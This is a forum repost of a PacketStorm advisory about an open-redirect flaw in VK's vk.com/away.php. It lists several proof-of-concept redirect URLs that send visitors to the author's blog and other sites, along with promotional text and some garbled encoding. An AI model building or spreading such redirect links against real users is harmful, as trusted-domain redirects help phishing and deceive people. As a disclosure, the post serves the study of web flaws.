Jump to content
Praetorian503

VK Social Network Open Redirect

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

The VK social network at vk.com suffers from an open redirection vulnerability.

ÿþ+++++++++++

# Exploit Title :VK (social network)  URL Redirector Abuse

# *Vendor*: www.vk.com

# Author: Juan Carlos García (NightSec)

# Blog: http://hackingmadrid.blogspot.com



# Facebook http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196



*************************************************************************************

BREIF DESCRIPTION

**************************************************************************************

  VK (Originally VKontakte, Russian: >=B0:B5)[3] is a European social network service popular among Russian-speaking users around the world. It is especially popular in Russia, Ukraine, Kazakhstan, Moldova, Belarus, and Israel. VK is a Facebook clone, with several common features, such as university exclusiveness of a network during its early stages, similar color, and similar features and functionality. VK is able to hold the position, the main countries, and successfully move ahead in Europe and America, despite efforts of the American network. Like other social networks, VK allows users to message contacts publicly or privately, create groups, public pages and events, share and tag images, audio and video, and play browser-based games.



*********************************

*********************************



URL Redirector Abuse



PoC



http://vk.com/away.php?mt=8&to=http://hackingmadrid.blogspot.com



http://vk.com/away.php?locale=ru_RU&to=http://google.com/search?q=Hackingmadrid



http://vk.com/away.php?locale=ru_RU&to=http://google.com/search?q=Ethical Hacking y ole by the face



http://vk.com/away.php?feature=share&post=193_594&to=http://www.hackingmadrid.blogspot.com



http://vk.com/away.php?to=http://hackingmadrid.blogspot.com



http://vk.com/away.php?to=http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196



http://vk.com/away.php?mt=8&post=-43583105_11&to=http://www.owasp.org



Procedure:Open de link given above





**************************************************************************

Give special thanks to all the people who follow me on Ethical Hacking and Ole by the Face .. Thanks guys 



*************************************************************************************



Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...